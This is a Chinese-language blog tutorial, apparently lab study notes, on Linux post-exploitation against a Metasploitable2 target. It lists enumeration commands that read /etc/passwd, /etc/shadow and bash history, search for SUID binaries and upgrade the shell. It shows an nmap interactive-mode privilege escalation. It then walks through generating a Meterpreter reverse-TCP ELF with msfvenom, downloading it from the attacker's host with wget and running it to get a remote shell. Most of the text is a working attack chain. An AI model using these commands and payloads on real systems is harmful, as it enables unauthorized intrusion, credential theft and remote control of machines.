内网渗透 day7-linux信息收集
linux信息搜集
1. linux信息搜集
id 查看当前用户的权限和所在的管理组
python -c "import pty;pty.spawn('/bin/bash');" 会话提升
uname -a 查看linux版本内核信息
cat /etc/*release 查看linux发行信息
dpkg -l 查看安装的包
crontab -l 是否有计划任务(这边显示没有计划任务)
/sbin/ifconfig -a 查看ip地址等
cat /etc/passwd 普通用户可以查看用户的信息
cat /etc/shadow 账号密码信息(root权限)(这边显示没有权限)
cat /root/.mysql_history 查看mysql历史操作(靶机和kali都未对mysql进行过操作所以没有这个文件)
cat /root/.bash_history 查看用户指令历史记录
cat /proc/version 查看内核信息
find / -perm -u=s -type f 2>/dev/null 匹配高权限的文件,看是否有利用点
/:代表查询位置,当前设置为根目录
-perm:代表权限
-u=s:代表用户的权限 s:superbin
-type:类型 ,f代表文件 file
2. nmap漏洞复现
nmap --interactive -->!sh 利用nmap3.5<4.6.4之间存在的漏洞进行提权 |
3. msf linux模块反弹shell
先在kali上生成木马
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -f elf -o xx.elf linux的x86 payload需要跟上x86 |
首先先然metasploit2下载kali上的木马文件
wget http://1192.168.227.129:80/xx.elf linux从命令行下载网页文件 |
然后将文件赋予能执行的权利(这里为了方便直接给了4777)
chmod 4777 xx.elf 修改文件权限 |
因为是linux系统所以在设置监听的payload的时候需要也是linux
linux执行xx.elf文件
成功进入到meterpreter界面
![wps21[1] wps21[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110817500-1599423300.jpg)
![wps22[1] wps22[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110818200-1396797808.jpg)
![wps24[1] wps24[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110819553-1606550039.jpg)
![wps25[1] wps25[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110820311-1585247743.jpg)
![wps26[1] wps26[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110821028-203205117.jpg)
![wps27[1] wps27[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110821766-1380169548.jpg)
![wps28[1] wps28[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110822855-295681734.jpg)
![wps29[1] wps29[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110823619-3388173.jpg)
![wps30[1] wps30[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110824377-1638251472.jpg)
![wps31[1] wps31[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110825012-60386093.jpg)
![wps32[1] wps32[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110825810-438865720.jpg)
![wps33[1] wps33[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110826345-1582929489.jpg)
![wps34[1] wps34[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110826953-1059283773.jpg)
![wps35[1] wps35[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110827692-1188440316.jpg)
![wps36[1] wps36[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110828437-516407417.jpg)
![wps37[1] wps37[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110829262-1087659657.jpg)
![wps39[1] wps39[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110830378-1855522840.jpg)
![wps40[1] wps40[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110831025-1654901801.jpg)
![wps41[1] wps41[1]](https://img2020.cnblogs.com/blog/2209303/202011/2209303-20201111110831679-1156566590.jpg)
浙公网安备 33010602011771号